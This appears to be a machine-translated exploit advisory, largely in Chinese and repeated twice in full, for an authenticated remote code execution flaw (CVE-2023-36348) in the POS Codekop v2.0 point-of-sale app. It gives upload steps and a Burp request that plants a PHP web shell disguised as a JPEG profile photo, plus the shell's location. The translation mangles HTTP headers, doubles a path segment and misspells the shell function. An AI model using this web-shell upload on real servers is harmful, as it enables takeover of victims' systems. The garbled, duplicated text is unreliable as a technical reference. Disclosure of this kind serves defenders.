#利用标题: POS CODEKOP v2.0-身份验证的远程代码执行(RCE)
#日期: 25-05-2023
#利用作者: Yuyudhn
#供应商homepage3360 https://www.codekop.com/
#软件link: https://github.com/fauzan1892/pos-kasir-php
#版本: 2.0
#在: Linux上测试
#CVE: CVE-2023-36348
#漏洞描述:该应用程序不会对文件名进行消毒
将数据发送到/fungsi/edit/edit.php?gambar=user时。一个
攻击者可以通过上传PHP文件并访问它来利用此问题,
导致远程代码执行。
#参考: https://yuyudhn.github.io/pos-codekop-vulnerability/
#概念证明:
1。登录到POS Codekop仪表板。
2。转到个人资料设置。
3。通过上传配置文件照片上传php脚本。
Burp Log示例:
````````
post/research/pos-kasir-php/fungsi/edit/edit/edit.php?gambar=user http/1.1
HOST: LOCALHOST
内容长度: 8934
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
**升级- 不扣除requests: 1
Origin: http://localhost
content-type:多部分/form-data;
边界=--- WebKitFormBoundaryMvBHQH4M6KGKBNPA
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/114.0.5735.91 Safari/537.36
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,image/apng,/; q=0.8,application/application/signed-exchange; v=b3; q=0.7
sec-fetch-user:1 **
sec-fetch-Dest:文档
Referer: http://localhost/research/pos-kasir-php/index.php?page=用户
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=vqlfiarme77n1r4o8eh2kglfhv
连接:关闭
------ webkitformboundarymvbhqh4m6kgbnpa
content-disposition: form-data;名称='foto'; filename='asuka-rce.php'
content-type:图像/jpeg
•jfifhh²6?php passhru($ _ get ['cmd']); __halt_compiler();
ÿÛC
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
````````
PHP Web Shell位置:
http://localhost/research/pos-kasir-php/资产/img/user/[rando_number] asuka-rce.php
#日期: 25-05-2023
#利用作者: Yuyudhn
#供应商homepage3360 https://www.codekop.com/
#软件link: https://github.com/fauzan1892/pos-kasir-php
#版本: 2.0
#在: Linux上测试
#CVE: CVE-2023-36348
#漏洞描述:该应用程序不会对文件名进行消毒
将数据发送到/fungsi/edit/edit.php?gambar=user时。一个
攻击者可以通过上传PHP文件并访问它来利用此问题,
导致远程代码执行。
#参考: https://yuyudhn.github.io/pos-codekop-vulnerability/
#概念证明:
1。登录到POS Codekop仪表板。
2。转到个人资料设置。
3。通过上传配置文件照片上传php脚本。
Burp Log示例:
````````
post/research/pos-kasir-php/fungsi/edit/edit/edit.php?gambar=user http/1.1
HOST: LOCALHOST
内容长度: 8934
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
**升级- 不扣除requests: 1
Origin: http://localhost
content-type:多部分/form-data;
边界=--- WebKitFormBoundaryMvBHQH4M6KGKBNPA
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/114.0.5735.91 Safari/537.36
接受:
text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,image/apng,/; q=0.8,application/application/signed-exchange; v=b3; q=0.7
sec-fetch-user:1 **
sec-fetch-Dest:文档
Referer: http://localhost/research/pos-kasir-php/index.php?page=用户
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessid=vqlfiarme77n1r4o8eh2kglfhv
连接:关闭
------ webkitformboundarymvbhqh4m6kgbnpa
content-disposition: form-data;名称='foto'; filename='asuka-rce.php'
content-type:图像/jpeg
•jfifhh²6?php passhru($ _ get ['cmd']); __halt_compiler();
ÿÛC
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
````````
PHP Web Shell位置:
http://localhost/research/pos-kasir-php/资产/img/user/[rando_number] asuka-rce.php
